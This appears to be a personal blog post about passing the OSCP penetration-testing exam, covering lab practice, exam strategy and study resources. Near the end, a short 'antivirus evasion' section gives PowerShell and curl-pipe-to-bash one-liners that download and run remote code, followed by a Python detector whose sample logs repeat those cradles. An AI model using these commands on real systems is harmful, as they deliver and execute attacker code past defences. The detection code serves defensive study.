OSCP Experience — How I Earned 100 Points in 10 Hours

Hi everyone, today I'm going to tell you my story of how I rooted all 5 machines in my OSCP exam and earned 100 points in just 10 hours! I hope you find something here that is useful for your own journey!

It wasn't easy, but it wasn't that hard either; the only right word to describe the journey is "exciting". To give you a better picture, I am a Computer Science graduate with a Cyber Security major. I have been involved in cyber defense technology research for the past 2 years.

I have a very good understanding of Python, C, and Bash. These three played a major part in the success of my blue-team thesis on using machine learning to build a fully autonomous web application firewall. If you're interested in our research on remote code execution, you can read it here

The Background

For the first 10 days, while waiting for the PWK labs, I decided to practice in the Hack The Box lab. I followed Tjnull's OSCP-like box list and only did the Linux boxes. My plan was to get familiar with Linux exploitation before the PWK lab started, so that I could focus on Windows exploitation and buffer overflows later on.

The Methodology

  1. You keep trying the same exploit over and over again with an angry face and revert the machine over and over again, smashing your keyboard in the process :)
  2. You reach out to the community/forum/ippsec video or the official writeup to understand how the exploit works, why the service is exploitable, and how the exploit takes place, until you understand the flow.

I solved all of the PWK lab boxes and Tjnull's list, and I realized that sometimes you need a specific exploit for which there are very limited resources, even on Google. You need help, or at least a sanity check or a good keyword, to keep you on the right track.

My methodology is simple: when I encounter a new service that I'm not familiar with and have already spent too much time trying to get the exploit to work without success, I visit the forum without hesitation. Then I make sure to take good notes, so that if I encounter the same service in the future I can easily apply what I just learned. Pivoting and tunneling can be tricky too! Remember that "You learn something new every day."

The PWK Lab

The Start

In my first week, I was able to root a total of 29 boxes🔥🔥. In the second week I added another 23, for a total of 52 boxes in 2 weeks🔥🔥. My priority was to attack the Active Directory and dependent machines and skip the hard machines. Slowly but surely, I could feel the fire inside me was about to burn out.

The Burnout

To deal with this, I decided to take a week-long vacation. I went out with my family, played Dota with my friends, and stayed up all night playing Cyberpunk (with a netrunner/hacker build, for sure!) for the whole week. Whenever I felt guilty, I would watch ippsec videos and keep my notes going.

If you are in this period, to move forward you just need to constantly ask yourself:

How bad do you want it?

The burnout period

The Comeback

The buffer overflow was a bit hard for me, but luckily Offsec provided a very clear video explaining step by step how the exploit occurs, so I understood the whole flow of the exploit. After reproducing the Win32 BOF exercises, the BOF machine in the lab was too easy.

In the first month of my lab time, I was able to completely pwn all the boxes in the PWK lab! I felt very happy but also worried about Windows privilege escalation, as I am not too familiar with the Windows environment (I am a Mac user).

The Waiting

In this period, I found https://ippsec.rocks/ and it was very useful in my exam. I booked for the 6th of September and later rescheduled it to the 3rd of September.

The Important Points in PWK Lab

  1. Make sure you solve the big 4 boxes in the lab without any help. No need to rush; just do these boxes whenever you feel ready. They will give you lots of new knowledge.
  2. Make sure you root every retired exam box. You will know one when you see it. These boxes are very different from the lab boxes; you will see why, and it will show you what to expect in the real exam.
  3. Make sure you master your tools. Which did you choose? NmapAutomator? AutoRecon? Manual Nmap? Make sure you are familiar with the output. Try your tools on the retired exam boxes.
  4. Make sure you master your reverse shells and understand how to choose the right port. The exam machines are very tricky and sensitive to inbound/outbound port rules. Test your methodology on the retired exam boxes.
  5. For what it's worth, don't focus only on your public department, as it will only give you the basic skills you need. Break into the other departments, learn how to pivot, and have fun with the real boxes!

The OSCP Exam

This was the first time that someone in my class took the OSCP exam, and everyone was very excited even though they are not into offensive security at all 🙃🙃

15 minutes before the exam started, I left the Discord channels and proceeded to the verification process. Everything went well and I got my VPN access at exactly 10.00 AM.

The Strategy

  1. Win32 Buffer Overflow (25 Points)
  2. Easy Box (10 Points)
  3. Medium Box (20 Points)
  4. Medium Box (20 Points) — Safe Point
  5. Hard Box (25 Points)

I used NmapAutomator on the 25-point box to save time. Then I started on my plan.

The Unexpected

I took a 30-minute break after finishing the buffer overflow, while waiting for Nmap to run. I ordered Gojek to deliver me some coffee, Shihlin, candy, and lunch. I was very excited!!

Next were the 10-point and 20-point boxes. These two boxes taught me about "Expect the Unexpected" and the "Try Harder" methodology 🙃🙃 I kept making small mistakes by underestimating an exploit and choosing a random port without any reason. After I applied what I had learned from the retired exam boxes in the lab, I was able to complete these boxes in just two hours.

The boxes are relatively easy but need lots of effort. Debugging, fixing, and downloading new services that I'm not very familiar with to get a better understanding of them is the way to understand both the flow and the flaw.

I took a one-hour break to go out with my little sister and pick up some ice cream at McD. Don't forget to relax; you're free to take as many breaks as you want as long as you ask the proctor politely. Then I started my next box.

I have two mottos to keep me in line with the exploit and sanity-check my progress. If it's too hard, I ask myself, "OSCP is a foundation course, would it go this far?" And if it looks too easy and straightforward but the exploit didn't work, I ask myself, "If it is this easy, why is the OSCP pass rate so low? There must be another way."

The next two boxes were relatively exciting. As far as I remember, I didn't use any public exploit to gain a shell at all! Purely chaining misconfigurations and taking advantage of open services! These boxes were very fun and represented a real-life scenario. In around two and a half hours I managed to get root on the 20-point box and a low-level shell on the 25-point box. I already had 87.5 points in my pocket and felt safe.

I decided to take another one-hour break. I contacted my colleagues to inform them that I had 4 roots and 1 low-level shell. They were very excited and congratulated me. My friends on Discord were very happy and sent me some food. I used this time to take a bath and relax.

The last privilege escalation took me 2 hours in total. It was very exciting to finally be able to use my web exploitation skills in this advanced CTF-like case. By chaining some vulnerabilities and services, I managed to get a Windows admin account through a web shell. I jumped out of my brand-new secret lab chair. My dad was next to me and hugged me when I said "I got 100 points". I then chatted to the proctor to say "Heyy, just want to let you know I got 100 points :) I am very happy". As expected, he didn't care and replied "Keep up the good work" 🙃🙃.

Even though it was only a web shell, I have mastered Nishang as my secret weapon and know how to upgrade such a shell to a fully interactive one. So I decided to take another 15-minute break to let my friends and colleagues know that I had 100 points! I WAS VERY HAPPY!

After the break, I upgraded the web shell to a proper reverse shell. It was very easy, since I had already used Nishang on all my Windows boxes. In exactly 10 hours, I rooted 5 machines and got 100 points! It took me another hour to reproduce all the exploits and take screenshots for the report. I stopped my exam afterwards.

I played Dota all night and started the report the next day. Around 7 hours after my submission, I got an email from the Offensive Security team that I had passed my OSCP exam!

My Gift

Resources:

  1. Already got a low-level shell? LinPEAS/WinPEAS to enumerate and pspy to spot the cron jobs.
  2. Don't know how to exploit a specific service? ippsec.rocks
  3. Don't know about common website and service exploits? HackTricks
  4. No service is exploitable? Try a kernel exploit: Linux Exploit Suggester 2 for Linux and Metasploit's Local Exploit Suggester for Windows.

Antivirus Evasion Technique

For Windows, you can use:

powershell iex (New-Object Net.WebClient).DownloadString('url')

And for Linux, you can take advantage of command chaining, in this case a pipe, to feed the raw file directly to bash:

curl URL | bash
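The two one-liners above are exactly the "download cradle" shapes a blue team looks for in process-creation telemetry, so here is an added example (mine, not code from the original post) of simple detection logic for them. It flags a PowerShell command that pairs a download primitive (Net.WebClient, DownloadString, Invoke-WebRequest and friends) with Invoke-Expression or its iex alias, decodes a -EncodedCommand payload (UTF-16LE base64) before matching, and flags curl/wget piped straight into a shell. The sample events, the hostnames, the TEST-NET address 198.51.100.7 and the flattened "key=value ... CommandLine=..." log format are all constructed for the example and are not any vendor's real schema.

```python
"""Detect download-cradle command lines in process-creation events.
Constructed example: sample events and log format are invented."""
import base64
import re
from typing import Dict, List, Optional

# Execution primitive: Invoke-Expression or its alias iex.
PS_EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
# Download primitives commonly chained into Invoke-Expression.
PS_DOWNLOAD_RE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|invoke-restmethod|\birm\b|start-bitstransfer",
    re.IGNORECASE,
)
# -EncodedCommand and its accepted prefixes (-e, -ec, -enc ...) followed by base64;
# the payload is UTF-16LE, which is why it is decoded that way below.
PS_ENC_RE = re.compile(r"\s-e[ncodema]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# "fetch | interpreter": curl/wget piped straight into a shell or scripting runtime.
NIX_PIPE_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh|ksh|dash|python[0-9.]*|perl)\b",
    re.IGNORECASE,
)


def analyze_command(cmd: str) -> Optional[Dict[str, object]]:
    """Classify one command line; returns a finding dict or None when nothing matched."""
    pipe = NIX_PIPE_RE.search(cmd)
    if pipe:
        return {"kind": "linux_pipe_to_interpreter", "severity": "high",
                "encoded": False, "evidence": pipe.group(0)}

    decoded = ""
    enc = PS_ENC_RE.search(cmd)
    if enc:
        try:
            decoded = base64.b64decode(enc.group(1)).decode("utf-16le", errors="ignore")
        except ValueError:  # not valid base64: nothing to decode, keep scanning the rest
            decoded = ""
    # Drop the base64 blob so its characters cannot produce accidental matches,
    # then scan the visible text plus whatever was decoded.
    text = PS_ENC_RE.sub(" ", cmd) + " " + decoded

    exec_hit = PS_EXEC_RE.search(text)
    dl_hit = PS_DOWNLOAD_RE.search(text)
    if exec_hit and dl_hit:
        return {"kind": "powershell_download_cradle", "severity": "high",
                "encoded": enc is not None, "evidence": dl_hit.group(0)}
    if dl_hit:
        # A download without in-memory execution is routine admin activity;
        # keep it as a low-severity signal for correlation rather than an alert.
        return {"kind": "powershell_download_only", "severity": "low",
                "encoded": enc is not None, "evidence": dl_hit.group(0)}
    return None


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Run analyze_command over flattened events and tag findings with their line number."""
    findings = []
    for number, line in enumerate(lines, start=1):
        cmd = line.split("CommandLine=", 1)[1] if "CommandLine=" in line else line
        finding = analyze_command(cmd)
        if finding:
            finding["line"] = number
            findings.append(finding)
    return findings


# Constructed sample events (invented users/hosts; 198.51.100.7 is a TEST-NET address).
_ENCODED = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')".encode("utf-16le")
).decode("ascii")
SAMPLE_LOGS = [
    "EID=1 user=CORP\\alice CommandLine=powershell iex (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
    "EID=1 user=CORP\\bob CommandLine=powershell.exe -nop -w hidden -enc " + _ENCODED,
    "EID=1 user=CORP\\carol CommandLine=powershell Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile report.csv",
    "EID=1 user=dave CommandLine=/bin/bash -c curl -s http://198.51.100.7/x.sh | bash",
    "EID=1 user=dave CommandLine=curl -s https://intranet.example/health | jq .status",
    "EID=1 user=CORP\\erin CommandLine=cmd.exe /c dir C:\\Users",
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['kind']} ({f['severity']}, encoded={f['encoded']}) <- {f['evidence']}")
```

Run as-is it reports the first four sample events and stays quiet on the curl-to-jq health check and the plain dir. Regex over the command line is brittle against obfuscation (string splitting, variable-built cmdlet names), which is why the more robust feed on Windows is PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log): it records the script content after PowerShell has resolved it, so the same matching applied there catches what the command line hides. Sysmon process creation (Event ID 1) or auditd execve records are the usual source for the Linux pipe pattern.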

Port Choosing Technique

I will update this section when I remember the other resources I used.

Special Thanks

Thanks to my friends for the constant support and time invested in me: Christoval Leaved, Yerriell K Hidayat, Verdi Vajira, and Pulkit Talwar.

I like the idea of breaking into something.